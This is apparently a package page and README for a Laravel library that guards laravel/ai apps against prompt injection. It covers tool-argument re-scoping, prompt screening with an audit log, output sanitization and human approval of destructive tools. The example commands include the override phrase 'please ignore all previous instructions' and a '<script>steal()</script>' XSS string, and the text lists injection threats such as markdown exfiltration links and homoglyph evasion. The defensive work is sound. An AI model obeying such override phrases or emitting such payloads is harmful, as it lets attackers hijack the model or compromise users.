padosoft/laravel-ai-guardrails
Composer install command:
composer require padosoft/laravel-ai-guardrails
Package description
Deterministic prompt-injection guardrails for laravel/ai: tool firewall, input screening + injection audit, untrusted-output sanitization, and a HITL approval bridge.
README
laravel-ai-guardrails
Deterministic, offline-first prompt-injection guardrails for laravel/ai.
Four composable controls that treat everything the model touches — its tool arguments, its prompts, and its output — as untrusted.
Table of Contents
- Why it exists
- What makes it different
- The four controls
- Quick start
- PHP surface
- Wiring the agent middleware
- Artisan surface
- HTTP API surface (admin)
- Configuration
- Composing laravel-flow & laravel-pii-redactor
- MCP surface
- HITL setup (Control D)
- The append-only injection audit
- Domain events
- Security & threat model
- Known limitations
- Testing
- Part of the Padosoft AI suite
- License
Why it exists
laravel/ai makes it trivial to give a model tools (refund an order, delete a record, send an email) and to feed it untrusted user input. That is exactly where prompt injection lives:
- The model can be talked into calling a tool with someone else's user_id (confused-deputy / IDOR).
- A crafted prompt can make it ignore its instructions or exfiltrate secrets.
- Its output — rendered in your UI — can carry stored-XSS, markdown data-exfiltration links, or leaked PII.
- It can decide, on its own, to pull the trigger on a destructive action.
laravel-ai-guardrails closes that gap with four deterministic, offline, unit-testable controls. No second LLM call, no network, no non-determinism — the audit trail is the product, not a regex you have to trust.
📚 Full documentation: doc.laravel-ai-guardrails.padosoft.com — guides, the four controls in depth, architecture & ADRs, configuration reference, and the HTTP/MCP surfaces.
What makes it different
- Untrusted-input posture, everywhere. Tool arguments, prompts, and model output are all treated as hostile.
- Deterministic & offline. Controls A–C never call a model; every decision is reproducible and testable.
- Fails closed. A PCRE error, a tampered flow record, an unresolved engine — every failure path blocks rather than silently allows.
- Append-only audit. Every screening attempt (blocked and allowed) is logged to an immutable store: the Eloquent model behind it refuses updates and deletes.
- Composes, doesn't reinvent. Optional padosoft/laravel-flow for human approval and padosoft/laravel-pii-redactor for PII, with graceful degradation when they are absent.
- Every feature is a toggle, tested in both states, with a master kill-switch that degrades the whole package to pass-through.
The four controls
| Control | Name | What it does | Threat it closes |
|---|---|---|---|
| A | Tool Firewall | Re-scopes model-chosen owner keys (user_id, …) to the authenticated principal server-side and validates every argument against the tool's own JSON schema. | Confused-deputy / IDOR via model-chosen arguments |
| B | Input Screening + Audit | Normalizes the prompt (defeating homoglyph / zero-width / case evasion), screens it, refuses before the model runs, and append-only-logs every attempt. | Jailbreak / exfiltration prompts |
| C | Output Handler | Treats the response as untrusted: escapes HTML, neutralizes markdown link/image exfil vectors, validates structured output, and redacts PII. | Stored-XSS / data-exfil / PII leakage in model output |
| D | HITL Bridge | Routes destructive tool calls (refund/delete/email) through laravel-flow's approvalGate(), so a human approves before the action runs. | Unauthorized destructive actions |
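Control B's normalize-then-screen step, including the fail-closed reaction to a PCRE error (the pattern_safety.on_match_error = closed default), can be sketched in plain PHP. This is a minimal illustration under assumptions, not the package's implementation: normalizePrompt() and screenPrompt() are hypothetical names, the zero-width set is only a sample, and NFKC runs only when ext-intl is loaded.

```php
<?php

// Hypothetical helpers illustrating Control B; not the package's API.

// Returns the normalized prompt, or null when normalization fails (the caller fails closed).
function normalizePrompt(string $prompt): ?string
{
    // NFKC folds compatibility forms such as fullwidth letters (needs ext-intl).
    if (class_exists('Normalizer')) {
        $nfkc = Normalizer::normalize($prompt, Normalizer::FORM_KC);
        if ($nfkc === false) {
            return null;
        }
        $prompt = $nfkc;
    }

    // Strip a sample of zero-width characters used to split trigger words.
    $stripped = preg_replace('/[\x{200B}-\x{200D}\x{2060}\x{FEFF}]/u', '', $prompt);
    if ($stripped === null) {
        return null; // e.g. invalid UTF-8
    }

    // Casefold so "IGNORE" and "ignore" hit the same rule.
    return mb_strtolower($stripped, 'UTF-8');
}

/**
 * @param array<string, string> $patterns ruleId => PCRE pattern
 * @return array{blocked: bool, ruleId: ?string}
 */
function screenPrompt(string $prompt, array $patterns): array
{
    $normalized = normalizePrompt($prompt);
    if ($normalized === null) {
        return ['blocked' => true, 'ruleId' => 'normalization_error'];
    }

    foreach ($patterns as $ruleId => $pattern) {
        $result = @preg_match($pattern, $normalized);
        // false means a PCRE error: block instead of skipping the rule (fail closed).
        if ($result === false || $result === 1) {
            return ['blocked' => true, 'ruleId' => $ruleId];
        }
    }

    return ['blocked' => false, 'ruleId' => null];
}
```

Checking preg_match() for false is what makes the loop fail closed; treating false as "no match" would silently let the prompt through.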
Quick start
Junior-proof. Five steps.
1. Install
composer require padosoft/laravel-ai-guardrails
2. Publish the config
php artisan vendor:publish --tag=ai-guardrails-config
3. (Optional) Publish + run the audit migration — only if you want database-backed audit:
php artisan vendor:publish --tag=ai-guardrails-migrations
php artisan migrate
then set AI_GUARDRAILS_AUDIT_STORE=database in your .env.
4. Guard a tool call (Control A) in your app:
use Padosoft\AiGuardrails\Facades\AiGuardrails;
$safeTool = AiGuardrails::guard($refundTool); // re-scopes owner keys + validates args
5. Screen a prompt or sanitize output anywhere:
$verdict = AiGuardrails::screen($userPrompt); // ->blocked, ->ruleId, ->refusalMessage
$clean = AiGuardrails::sanitize($modelOutput); // HTML/markdown sanitized + PII redacted
That's it. Add the agent middleware (below) to screen prompts and sanitize output automatically.
PHP surface
Everything is reachable from the AiGuardrails facade:
use Padosoft\AiGuardrails\Facades\AiGuardrails;

AiGuardrails::screen(string $prompt): ScreenVerdict; // Control B
AiGuardrails::sanitize(string $text): string; // Control C
AiGuardrails::guard(Tool $tool, ?Closure $principalResolver = null): Tool; // Control A
AiGuardrails::routeForApproval(Tool $tool, string $toolName, ?Closure $principalResolver = null): Tool; // Control D
AiGuardrails::isDestructive(string $toolName): bool;
AiGuardrails::validateStructured(array $output, array $schema, bool $rejectUnknown = false): array; // Control C
Wiring the agent middleware
Declare the input + output middleware on your agent (they implement laravel/ai's middleware contract):
use Laravel\Ai\Contracts\Agent;
use Laravel\Ai\Contracts\HasMiddleware;
use Padosoft\AiGuardrails\Output\GuardrailOutputMiddleware;
use Padosoft\AiGuardrails\Screening\GuardrailInputMiddleware;

final class SupportAgent implements Agent, HasMiddleware
{
    // ... the rest of your agent (instructions, tools, etc.)

    public function middleware(): array
    {
        return [
            app(GuardrailInputMiddleware::class),  // screens + refuses + audits before the model
            app(GuardrailOutputMiddleware::class), // sanitizes $response->text + structured fields after
        ];
    }
}
GuardrailInputMiddleware refuses without ever invoking the model when a prompt is blocked, and audits every attempt. GuardrailOutputMiddleware rewrites the response text (and the structured-output fields) in place — tool calls are left to Controls A/D.
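To make the "refuses without ever invoking the model" contract concrete, here is a framework-free sketch. It is not laravel/ai's middleware contract: guardedPrompt(), the refusal string, and the in-memory audit array are hypothetical stand-ins chosen only to show the ordering (screen, audit, then call the model only if allowed).

```php
<?php

/**
 * Hypothetical illustration: screen first, audit every attempt,
 * and only call the model when the prompt is allowed.
 *
 * @param callable(string): bool   $isBlocked
 * @param callable(string): string $model
 * @param list<array{prompt: string, blocked: bool}> $audit
 */
function guardedPrompt(string $prompt, callable $isBlocked, callable $model, array &$audit): string
{
    $blocked = $isBlocked($prompt);

    // Append-only: both blocked and allowed attempts are recorded.
    $audit[] = ['prompt' => $prompt, 'blocked' => $blocked];

    if ($blocked) {
        return "Sorry, I can't help with that request."; // the model is never invoked
    }

    return $model($prompt);
}
```

Because the refusal returns before $model is touched, a blocked prompt costs no tokens and cannot reach the model at all.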
Artisan surface
# Screen a prompt (exits non-zero when blocked); reads STDIN if no argument
php artisan ai-guardrails:screen "please ignore all previous instructions"

# Sanitize + redact a text blob
php artisan ai-guardrails:sanitize "<script>steal()</script> "

# List recent injection-audit attempts (blocked and allowed)
php artisan ai-guardrails:audit --limit=50

# Apply the GDPR retention strategy to the audit table (actor-audited; the only sanctioned erasure path)
php artisan ai-guardrails:purge --strategy=anonymize --days=365 --actor="ops:nightly"
php artisan ai-guardrails:purge --dry-run # report what would be affected, change nothing
HTTP API surface (admin)
A read/config HTTP API for an admin panel (e.g. laravel-ai-guardrails-admin). It is default-OFF: set api.enabled = true and supply a middleware stack via api.middleware. If api.enabled is true but api.middleware resolves to an empty list, the service provider throws a RuntimeException at boot, failing closed against an accidentally open surface. It does not, however, inspect what that middleware does, so you must include your own authentication and authorization middleware: these endpoints expose audit data and let an operator change security settings. Routes are mounted under api.prefix (default ai-guardrails/api) and named ai-guardrails.api.*.
Envelope. Successful (and handled-error, e.g. 404/409/422-via-controller) responses are enveloped as { "schema_version": "ai-guardrails.api.v1", "schema": "ai-guardrails.api.v1.<endpoint>", "data": { … } } — schema_version is the contract version a client pins against; schema is a per-endpoint discriminator. (Mirrors the padosoft-eval-harness ReportApi house style.) Exception: framework-level validation failures (a malformed PUT /settings body) return Laravel's standard 422 validation JSON, not the envelope.
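A client that pins schema_version might validate the envelope before trusting data. This is a sketch, assuming the response body has already been fetched as a JSON string; decodeEnvelope() and the PINNED_SCHEMA_VERSION constant are hypothetical client-side names, not something the package ships.

```php
<?php

const PINNED_SCHEMA_VERSION = 'ai-guardrails.api.v1';

/**
 * Hypothetical client-side check of the ai-guardrails.api.v1 envelope.
 *
 * @return array<mixed> the endpoint's data payload
 */
function decodeEnvelope(string $json, string $endpoint): array
{
    $body = json_decode($json, true, 512, JSON_THROW_ON_ERROR);

    // Refuse any contract version other than the one this client was built against.
    if (!is_array($body) || ($body['schema_version'] ?? null) !== PINNED_SCHEMA_VERSION) {
        throw new UnexpectedValueException('Unsupported contract version');
    }
    // schema is the per-endpoint discriminator, e.g. ai-guardrails.api.v1.overview
    if (($body['schema'] ?? null) !== PINNED_SCHEMA_VERSION . '.' . $endpoint) {
        throw new UnexpectedValueException('Unexpected endpoint schema');
    }
    if (!is_array($body['data'] ?? null)) {
        throw new UnexpectedValueException('Missing data object');
    }

    return $body['data'];
}
```

Because framework-level validation failures are not enveloped, a strict client like this one rejects Laravel's standard 422 body and needs a separate branch if it wants to show those field errors.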
| Method | Path | Route name | schema | Backing store / toggle |
|---|---|---|---|---|
| GET | /overview | …overview | …v1.overview | aggregates each control's enabled + effective mode (enforce/monitor/off) + 24h injection counts + the active ruleset_version |
| GET | /audit | …audit.index | …v1.audit-list | audit.store (null / array / database); keyset paginated (cursor), filters blocked/rule_id/principal_id/q/from/to |
| GET | /audit/{id} | …audit.show | …v1.audit-detail | full prompt + matched_span; 404 on unknown/non-numeric id |
| GET | /audit/trend | …audit.trend | …v1.audit-trend | per-UTC-day SQL GROUP BY (dialect-safe); 30-day default window |
| GET | /firewall | …firewall.index | …v1.firewall | firewall_log.store: Control A rejections, keyset paginated |
| GET | /output/stats | …output.stats | …v1.output-stats | output_stats.store: per-kind counts, 30-day default window |
| GET | /approvals | …approvals.index | …v1.approval-list | Control D pending approvals (via laravel-flow); empty when HITL unavailable |
| POST | /approvals/{token}/approve | …approvals.approve | …v1.approval-decision | resumes the parked tool; actor principal derived server-side |
| POST | /approvals/{token}/reject | …approvals.reject | …v1.approval-decision | rejects the parked tool |
| GET | /settings | …settings.show | …v1.settings | settings.store (config / database): effective overridable settings |
| PUT | /settings | …settings.update | …v1.settings | persists allow-listed, type-validated overrides; appends a change record + dispatches SettingsChanged |
| GET | /settings/changes | …settings.changes | …v1.settings-changes | settings_audit.store (null / array / database): append-only WHO/WHAT change log |
| POST | /try/screen | …try.screen | …v1.try-screen | sandbox: screen a prompt (no persistence) |
| POST | /try/sanitize | …try.sanitize | …v1.try-sanitize | sandbox: sanitize a text blob (no persistence) |
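Keyset (cursor) pagination, used by the audit and firewall lists, avoids OFFSET scans by resuming strictly after the last key already seen. A minimal in-memory sketch, assuming rows ordered by a descending integer id and a hypothetical cursor that is just the base64 of the last id; the real endpoints run this against SQL, and their cursor format is not documented here.

```php
<?php

/**
 * Return one page of rows with id strictly below the cursor, newest first.
 *
 * @param list<array{id: int}> $rows
 * @return array{items: list<array{id: int}>, next_cursor: ?string}
 */
function keysetPage(array $rows, ?string $cursor, int $limit): array
{
    $limit = max(1, $limit);
    // Hypothetical cursor format; an undecodable cursor yields an empty page.
    $afterId = $cursor === null ? PHP_INT_MAX : (int) base64_decode($cursor, true);

    usort($rows, fn (array $a, array $b): int => $b['id'] <=> $a['id']);
    $remaining = array_values(array_filter($rows, fn (array $r): bool => $r['id'] < $afterId));

    $items = array_slice($remaining, 0, $limit);
    $hasMore = count($remaining) > $limit;
    $next = $hasMore ? base64_encode((string) end($items)['id']) : null;

    return ['items' => $items, 'next_cursor' => $next];
}
```

In SQL the same idea is `WHERE id < :after ORDER BY id DESC LIMIT :n`, which stays fast on an indexed id however deep the client pages.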
Append-only stores. The audit, firewall, output-stat, and settings-change tables are immutable (the Eloquent model and its query builder throw on update/delete). Settings, by contrast, are current-state and mutable: GET /settings returns them, and PUT /settings only accepts keys on the settings.overridable allow-list and type-validates each value (booleans, enums, bounded strings). Unknown keys are dropped; malformed values are rejected with a 422. When settings.store = database, saved overrides are overlaid onto the live config at boot so they actually take effect on the controls (fail-safe: a corrupt, null, or type-mismatched row keeps the file default). Every effective change (before ≠ after) is recorded to the settings_audit store with the server-derived actor (never client-supplied) and surfaced by GET /settings/changes.
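The PUT /settings rules above (allow-list, per-key type validation, drop unknown keys, reject malformed values, record only effective changes with a server-derived actor) fit in one short function. A sketch under assumptions: applyOverrides(), the key => validator-closure allow-list shape, the example keys, and the change-record fields are all hypothetical, not the package's settings.overridable format.

```php
<?php

/**
 * @param array<string, mixed> $current   effective settings before the update
 * @param array<string, mixed> $input     client-supplied overrides
 * @param array<string, Closure(mixed): bool> $allowList key => validator
 * @return array{settings: array<string, mixed>, changes: list<array{key: string, before: mixed, after: mixed, actor: string}>}
 */
function applyOverrides(array $current, array $input, array $allowList, string $actor): array
{
    $settings = $current;
    $changes = [];

    foreach ($input as $key => $value) {
        if (!isset($allowList[$key])) {
            continue; // unknown keys are dropped, not errors
        }
        if (!$allowList[$key]($value)) {
            // Nothing is returned, so nothing is persisted; an API would map this to a 422.
            throw new InvalidArgumentException("Invalid value for {$key}");
        }
        $before = $settings[$key] ?? null;
        if ($before !== $value) {
            // Only effective changes are recorded; $actor comes from the server, never the client.
            $changes[] = ['key' => $key, 'before' => $before, 'after' => $value, 'actor' => $actor];
            $settings[$key] = $value;
        }
    }

    return ['settings' => $settings, 'changes' => $changes];
}
```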
Configuration
Every behaviour is a config toggle (config/ai-guardrails.php). Controls A–C are on by default (that is the point). The HITL bridge (Control D, hitl.enabled) and the HTTP API (api.enabled) are default-OFF because they need optional dependencies or an explicit opt-in. A master kill-switch sits on top.
| Key | Default | Purpose |
|---|---|---|
| enabled | true | Master kill-switch: off degrades every control to pass-through. |
| tool_firewall.owner_keys | user_id, owner_id, account_id, customer_id | Argument keys the model may never choose (overwritten server-side). |
| tool_firewall.reject_unknown_arguments | true | Reject arguments not declared in the tool schema. |
| input_screen.patterns | (4 built-in) | ruleId => PCRE pattern; the audit is the value, not the list. |
| normalization.* | on | NFKC, zero-width strip, casefold, max_prompt_length. |
| pattern_safety.on_match_error | closed | closed = block on a PCRE error; open = skip the rule. |
| output_handler.html_mode | escape | escape (default) or allowlist (keep a safe inline-tag set). |
| output_handler.redact_pii | true | Redact PII via laravel-pii-redactor when present. |
| hitl.enabled | false | Enable the HITL approval bridge (needs laravel-flow). |
| hitl.destructive_tools | refund, delete, send_email | Tool names treated as destructive. |
| hitl.fallback | deny | When approval is unavailable: deny (refuse) or pass (execute). |
| audit.store | 'null' | 'null' / 'array' / 'database' (string tokens). |
| tool_authorization.enabled | false | Gate tool use behind a Laravel Gate ability (fail-closed), separate from owner-key re-scoping. |
| tool_authorization.ability | ai-guardrails:use-tool | The Gate ability checked (with the tool class) before a guarded tool runs. |
| tool_authorization.owner_key_depth | top_level | recursive re-scopes owner keys at any nesting depth; top_level only at the top level. |
| api.enabled | false | The default-OFF HTTP admin API surface. |
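Owner-key re-scoping (tool_firewall.owner_keys, with depth chosen by tool_authorization.owner_key_depth) amounts to overwriting every listed key with the authenticated principal, either at the top level only or at any depth. A sketch, assuming the tool arguments arrive as a decoded PHP array; rescopeOwnerKeys() is a hypothetical name.

```php
<?php

/**
 * Overwrite model-chosen owner keys with the server-side principal.
 *
 * @param array<mixed> $args
 * @param list<string> $ownerKeys e.g. user_id, owner_id, account_id, customer_id
 * @return array<mixed>
 */
function rescopeOwnerKeys(array $args, int|string $principalId, array $ownerKeys, bool $recursive): array
{
    foreach ($args as $key => $value) {
        if (in_array($key, $ownerKeys, true)) {
            // Whatever the model chose is discarded, even if it happens to be correct.
            $args[$key] = $principalId;
        } elseif ($recursive && is_array($value)) {
            $args[$key] = rescopeOwnerKeys($value, $principalId, $ownerKeys, true);
        }
    }

    return $args;
}
```

With top_level semantics (recursive = false) a nested customer_id survives untouched; that trade-off is exactly what the recursive setting exists to close.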
Tool authorization (Control A+)
Owner-key re-scoping stops the model acting on another user's resource — it does not decide whether the principal may use the tool at all. Enable tool_authorization.enabled and define the Gate ability to add that second layer:
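use Illuminate\Support\Facades\Gate;

// e.g. in AppServiceProvider::boot(); mayUse() is a hypothetical method standing in for your own permission check
Gate::define('ai-guardrails:use-tool', fn ($user, string $toolClass) => $user->mayUse($toolClass));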
AiGuardrails::guard() then composes authorize → re-scope → validate → run; a denial throws ToolNotAuthorized. It fails closed: an undefined ability, an unauthenticated user, or a throwing policy all deny.
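The authorize → re-scope → validate → run order, and the rule that an undefined ability or a throwing policy denies, can be sketched with plain closures. Everything here is a hypothetical stand-in: runGuardedTool(), ToolNotAuthorizedSketch (in place of the package's ToolNotAuthorized), the closure signatures, and the required-keys check that substitutes for real JSON-schema validation.

```php
<?php

final class ToolNotAuthorizedSketch extends RuntimeException {}

/**
 * @param Closure(): ?bool $policy true allows; null models an undefined ability or a guest user
 * @param Closure(array<mixed>): array<mixed> $rescope
 * @param list<string> $requiredKeys stand-in for JSON-schema validation
 * @param Closure(array<mixed>): mixed $tool
 * @param array<mixed> $args
 */
function runGuardedTool(Closure $policy, Closure $rescope, array $requiredKeys, Closure $tool, array $args): mixed
{
    // 1. Authorize, failing closed: anything but an explicit true, or any exception, denies.
    try {
        $allowed = $policy() === true;
    } catch (Throwable) {
        $allowed = false;
    }
    if (!$allowed) {
        throw new ToolNotAuthorizedSketch('Tool use denied');
    }

    // 2. Re-scope owner keys, 3. validate, 4. run.
    $args = $rescope($args);
    foreach ($requiredKeys as $key) {
        if (!array_key_exists($key, $args)) {
            throw new InvalidArgumentException("Missing argument: {$key}");
        }
    }

    return $tool($args);
}
```

Authorizing first means a denied principal never gets as far as having arguments rewritten or validated.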
The modes, audit_hygiene, and retention config blocks are documented in their own sections (audit_hygiene and retention under The append-only injection audit).
Composing laravel-flow & laravel-pii-redactor
Both are optional (suggest). The package degrades gracefully:
composer require padosoft/laravel-flow          # enables Control D (human approval)
composer require padosoft/laravel-pii-redactor  # enables PII redaction in Control C
When a package is absent, class_exists guards bind null-object implementations, and the boundary is enforced by an architecture test (flow is referenced only in src/Hitl, pii-redactor + HTMLPurifier only in src/Output, and laravel/mcp only in src/Mcp).
MCP surface
A fourth surface (after PHP, Artisan, HTTP API): expose the guardrails to AI clients via laravel/mcp. Default-OFF — install the package and set mcp.enabled = true:
composer require laravel/mcp
# config/ai-guardrails.php → 'mcp' => ['enabled' => true]
php artisan mcp:start ai-guardrails # local (stdio) server
Registered under the handle ai-guardrails with three tools: screen_prompt (Control B verdict), sanitize_output (Control C clean), and recent_injection_audit (read the append-only log). The laravel/mcp reference is confined to src/Mcp (architecture test).
HITL setup (Control D)
Control D needs laravel-flow installed and its tables migrated. Two commands make that turnkey and verifiable:
# Run laravel-flow's migrations (flow_runs / flow_approvals) straight from vendor: scoped, idempotent
php artisan ai-guardrails:hitl-install

# Diagnose the setup: flow installed? persistence on? tables present? hitl + master enabled?
php artisan ai-guardrails:hitl-status
Then set LARAVEL_FLOW_PERSISTENCE_ENABLED=true and AI_GUARDRAILS_HITL_ENABLED=true. hitl-status exits non-zero (and prints exactly what is missing) until HITL can actually gate a destructive call.
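Control D's routing decision combines hitl.destructive_tools with hitl.fallback. A sketch of that decision alone, assuming a boolean that says whether approval is actually available (roughly what hitl-status verifies); routeToolCall() and the 'run' / 'park' / 'deny' outcomes are hypothetical labels, and this sketch chooses to treat any fallback value other than 'pass' as deny.

```php
<?php

/**
 * @param list<string> $destructiveTools e.g. refund, delete, send_email
 * @return 'run'|'park'|'deny'
 */
function routeToolCall(string $toolName, array $destructiveTools, bool $approvalAvailable, string $fallback): string
{
    if (!in_array($toolName, $destructiveTools, true)) {
        return 'run'; // not destructive: no human gate
    }
    if ($approvalAvailable) {
        return 'park'; // wait for a human via laravel-flow's approvalGate()
    }

    // No approval path: only an explicit 'pass' executes; anything else (including typos) denies.
    return $fallback === 'pass' ? 'run' : 'deny';
}
```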
The append-only injection audit
The audit is the product value of Control B. Every screening attempt — blocked and allowed — is appended to an immutable store. The Eloquent model and its query builder throw on update / delete / upsert / touch / increment / truncate; the table has no updated_at. Timestamps are stored in UTC.
Data hygiene (audit_hygiene.prompt_storage). Because the table captures raw prompts, the stored prompt is transformed before persistence: redact (default — composes laravel-pii-redactor), hash (sha256:…, correlate without keeping content), truncate (first truncate_at code points), or raw. Hygiene is applied at the store boundary so every write path is covered; domain events still carry the raw prompt in-process.
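The four prompt_storage modes are small transformations applied at the store boundary. A sketch, assuming a caller-supplied redactor callable in place of laravel-pii-redactor (whose API is not shown here); storedPrompt() is a hypothetical name.

```php
<?php

/**
 * @param callable(string): string $redactor stand-in for laravel-pii-redactor
 */
function storedPrompt(string $prompt, string $mode, int $truncateAt, callable $redactor): string
{
    return match ($mode) {
        'redact' => $redactor($prompt),
        // Correlate identical prompts without keeping their content.
        'hash' => 'sha256:' . hash('sha256', $prompt),
        // Count code points, not bytes, so multibyte characters are never split.
        'truncate' => mb_substr($prompt, 0, $truncateAt, 'UTF-8'),
        'raw' => $prompt,
        default => throw new InvalidArgumentException("Unknown prompt_storage mode: {$mode}"),
    };
}
```

The hash mode still lets an operator see that the same prompt was tried many times, which is often all an injection investigation needs.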
Retention / erasure (retention.strategy). GDPR erasure on an append-only table goes through the sanctioned, actor-audited ai-guardrails:purge command — the only place rows leave the table. anonymize nulls the prompt + principal of rows older than retention.days, purge hard-deletes them, keep retains. Every run logs the actor, strategy, cutoff, and affected-row count.
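The retention strategies differ only in what happens to rows older than the cutoff. An in-memory sketch, assuming rows carry a UTC created_at string plus nullable prompt and principal_id fields; applyRetention() is a hypothetical name, and where the real command logs the actor, strategy, cutoff, and count, this sketch only returns them.

```php
<?php

/**
 * @param list<array{created_at: string, prompt: ?string, principal_id: ?string}> $rows
 * @return array{rows: list<array{created_at: string, prompt: ?string, principal_id: ?string}>, affected: int, cutoff: string}
 */
function applyRetention(array $rows, string $strategy, int $days, DateTimeImmutable $now): array
{
    if (!in_array($strategy, ['anonymize', 'purge', 'keep'], true)) {
        throw new InvalidArgumentException("Unknown retention strategy: {$strategy}");
    }

    $utc = new DateTimeZone('UTC');
    $cutoff = $now->setTimezone($utc)->modify("-{$days} days");
    $kept = [];
    $affected = 0;

    foreach ($rows as $row) {
        $isOld = new DateTimeImmutable($row['created_at'], $utc) < $cutoff;
        if ($isOld && $strategy === 'purge') {
            $affected++;
            continue; // hard delete
        }
        if ($isOld && $strategy === 'anonymize') {
            $affected++;
            $row['prompt'] = null;
            $row['principal_id'] = null;
        }
        $kept[] = $row; // 'keep' retains everything untouched
    }

    return ['rows' => $kept, 'affected' => $affected, 'cutoff' => $cutoff->format(DATE_ATOM)];
}
```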
Domain events
Every guardrail decision dispatches a domain event from the same code path that writes the audit / stat record, so you can wire SIEM, Slack, or PagerDuty with a single listener. Events are gated by events.enabled (default on); set it to false to silence them without touching the controls.
| Event | Dispatched when | $enforced |
|---|---|---|
| Padosoft\AiGuardrails\Events\InjectionBlocked | Control B refused a prompt (enforce) | n/a (separate class) |
| Padosoft\AiGuardrails\Events\InjectionObserved | Control B detected an injection but passed it through (monitor) | n/a (separate class) |
| Padosoft\AiGuardrails\Events\ToolArgumentRejected | Control A found owner-key / schema violations in a tool call | true = call blocked; false = monitor, call proceeded |
| Padosoft\AiGuardrails\Events\DestructiveToolRouted | Control D parked a destructive call for human approval (carries the non-secret run reference only) | n/a (enforce only) |
| Padosoft\AiGuardrails\Events\OutputSanitized | Control C neutralised HTML / markdown / structured / PII in a response (one event per response, deduped kinds) | true = text rewritten; false = monitor, text unchanged |
In monitor mode the Observed/Rejected/Sanitized events still fire. The $enforced property on ToolArgumentRejected and OutputSanitized encodes the enforcement decision directly in the payload — listeners do not need to read the live config to distinguish a real block from a shadow observation.
Security note: InjectionBlocked / InjectionObserved carry the raw prompt text (via $attempt->prompt). If you ship these events to an external webhook (Slack, PagerDuty, SIEM), be aware that the payload may contain PII or sensitive input. Extract only the fields you need (ruleId, blocked, occurredAt) rather than forwarding the full InjectionAttempt object.
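Following that advice, a listener can build its outbound payload from an allow-list of fields instead of serializing the event. A sketch, assuming a stand-in InjectionAttemptSketch class with the ruleId, blocked, occurredAt, and prompt properties named above; the real InjectionAttempt class and how a listener reaches it may differ, and webhookPayload() is a hypothetical name.

```php
<?php

// Stand-in for the package's InjectionAttempt; property names follow the note above.
final class InjectionAttemptSketch
{
    public function __construct(
        public readonly string $ruleId,
        public readonly bool $blocked,
        public readonly DateTimeImmutable $occurredAt,
        public readonly string $prompt,
    ) {}
}

/** @return array{ruleId: string, blocked: bool, occurredAt: string} */
function webhookPayload(InjectionAttemptSketch $attempt): array
{
    // Allow-list the fields to ship; the raw prompt never leaves the process.
    return [
        'ruleId' => $attempt->ruleId,
        'blocked' => $attempt->blocked,
        'occurredAt' => $attempt->occurredAt->format(DATE_ATOM),
    ];
}
```

An allow-list is safer than stripping prompt from a serialized object, because a field added to the event later is excluded by default.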
Security & threat model
| Control | Untrusted surface | Posture |
|---|---|---|
| A | model-chosen tool arguments | re-scope owner keys server-side + schema-validate; re-scoping is not authorization |
| B | user prompts | normalize → screen → refuse pre-model → append-only audit; fail closed on PCRE errors |
| C | model output (text + structured fields) | escape HTML / defang markdown & URI exfil vectors / validate structure / redact PII |
| D | destructive tool calls | human-gated via approvalGate(); the plain-text token is never returned to the model |
Every failure path fails closed. The master kill-switch and per-control toggles are tested in both states.
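Row C of the table above (escape HTML, defang markdown and URI exfiltration vectors) can be approximated in a few lines for the escape mode. A minimal sketch under assumptions: sanitizeOutput() is hypothetical, PII redaction and structured-output validation are left out, it drops every markdown URL rather than judging which ones are safe, and a regex is no substitute for a real markdown parser.

```php
<?php

function sanitizeOutput(string $text): string
{
    // 1. Escape HTML so <script> tags and event-handler attributes render as text.
    //    ENT_SUBSTITUTE also replaces invalid UTF-8, keeping step 2's /u regex safe.
    $escaped = htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');

    // 2. Defang markdown links and images: keep the label, drop the URL, so an
    //    auto-loaded image such as ![x](https://evil.example/?q=secret) cannot exfiltrate.
    $defanged = preg_replace('/!?\[([^\]]*)\]\([^)]*\)/u', '$1', $escaped);

    // Fail closed: on a regex error, return nothing rather than the unsanitized text.
    return $defanged ?? '';
}
```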
Known limitations
- Control C rewrites $response->text and structured string fields; the model's toolCalls are governed by Controls A/D and are not sanitized by default. An opt-in output_handler.sanitize_tool_calls flag (default off) adds a defense-in-depth pass that cleans the string leaves of tool-call arguments. Enable it only when those arguments are rendered or logged, since rewriting them could otherwise alter a legitimate call.
- Cross-script homoglyphs are folded to a Latin skeleton before matching via a curated confusables map (normalization.fold_confusables, default on): Cyrillic а/о/е…, Greek ο/α/ρ…. It is a high-value curated subset, not the full Unicode confusables data, so an exotic look-alike outside the map can still slip through; extend ConfusablesFolder for a wider threat model.
- The HTML allowlist mode uses HTMLPurifier when ezyang/htmlpurifier is installed (robust parsing of malformed / entity-encoded / mutation-XSS markup), and gracefully falls back to the built-in strip_tags allowlist when it is absent. escape mode is unchanged.
- Control D's flow persistence (approval tokens, resume) is provided by the host's laravel-flow install, made turnkey by ai-guardrails:hitl-install and verifiable by ai-guardrails:hitl-status (see HITL setup).
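Confusable folding is a character-to-skeleton map applied before the screening patterns run. A sketch covering only the six look-alikes named above; foldConfusables() and the CONFUSABLES constant are hypothetical and are not the package's ConfusablesFolder.

```php
<?php

// Tiny curated map: Cyrillic and Greek look-alikes to their Latin skeleton.
const CONFUSABLES = [
    "\u{0430}" => 'a', // Cyrillic а
    "\u{043E}" => 'o', // Cyrillic о
    "\u{0435}" => 'e', // Cyrillic е
    "\u{03B1}" => 'a', // Greek α
    "\u{03BF}" => 'o', // Greek ο
    "\u{03C1}" => 'p', // Greek ρ
];

function foldConfusables(string $text): string
{
    // strtr's array form matches whole keys, so multibyte UTF-8 keys only match complete characters.
    return strtr($text, CONFUSABLES);
}
```

Folding before matching lets a single ASCII pattern such as /ignore/ catch "ignоrе" spelled with Cyrillic letters; anything outside the map passes through unchanged, which is the limitation described above.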
Testing
composer install
vendor/bin/phpunit # Unit + Feature + Architecture
vendor/bin/pint --test
vendor/bin/phpstan analyse --memory-limit=512M
CI runs the matrix PHP 8.3 / 8.4 / 8.5 × Laravel 13: composer validate → pint → phpstan (level 8) → phpunit.
Part of the Padosoft AI suite
laravel-ai-guardrails pairs with laravel-ai-guardrails-admin (a React control plane for the audit trail, firewall posture, output stats, and approval queue), and composes padosoft/laravel-flow and padosoft/laravel-pii-redactor.
License
Apache-2.0 © Padosoft s.r.l. See LICENSE.
Other information
- License: Apache-2.0
- Last updated: 2026-06-18
